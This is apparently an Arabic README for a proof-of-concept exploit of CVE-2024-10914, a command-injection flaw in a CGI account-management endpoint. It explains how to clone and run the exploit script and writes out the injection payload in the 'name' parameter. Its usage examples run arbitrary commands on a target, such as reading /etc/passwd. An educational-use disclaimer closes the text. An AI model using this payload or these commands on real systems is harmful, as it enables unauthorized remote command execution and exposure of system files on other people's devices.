
إثبات المفهوم لاستغلال CVE-2024-10914
استغلال لثغرة حقن الأوامر في نقطة الوصول /cgi-bin/account_mgr.cgi. تسمح هذه الثغرة بتنفيذ أوامر عشوائية على النظام المتأثر عبر معاملات غير معقمة.
CVE-2024-10914 هي ثغرة حقن أوامر تؤثر على الأجهزة التي تحتوي على واجهة ويب CGI. التطبيق الثغري لا يتحقق بشكل صحيح من المعامل name في الطلب cgi_user_add، مما يسمح للمهاجم بحقن أوامر النظام التي سيتم تنفيذها بصلاحيات التطبيق.
استنسخ المستودع وقم بتثبيت التبعيات:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
أو قم بالتثبيت يدويًا:
pip install requests
يوفر السكربت وسيطين:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>
-u, --url (مطلوب): رابط الهدف (مثال: http://192.168.1.1)-c, --command (اختياري): الأمر المراد تنفيذه (الافتراضي: id)تنفيذ الأمر id:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
تنفيذ أمر مخصص:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
سرد الملفات:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
يرسل الاستغلال طلب GET إلى نقطة الوصول الثغري مع الحمولة التالية:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "
يتم إغلاق السلسلة الفارغة بعلامات اقتباس ويتم حقن الأمر المطلوب، والذي يتم تنفيذه في سياق الخادم.
سيعرض السكربت:
يتم توفير هذا الكود فقط للأغراض التعليمية وأبحاث الأمان. يجب استخدامه فقط على الأنظمة التي لديك إذن صريح لاستخدامه عليها. قد يؤدي الاستخدام غير المصرح به لهذا الاستغلال إلى انتهاك القوانين المحلية ويشكل جريمة. المؤلف غير مسؤول عن سوء استخدام هذه الأداة.
SS3K
غير محدد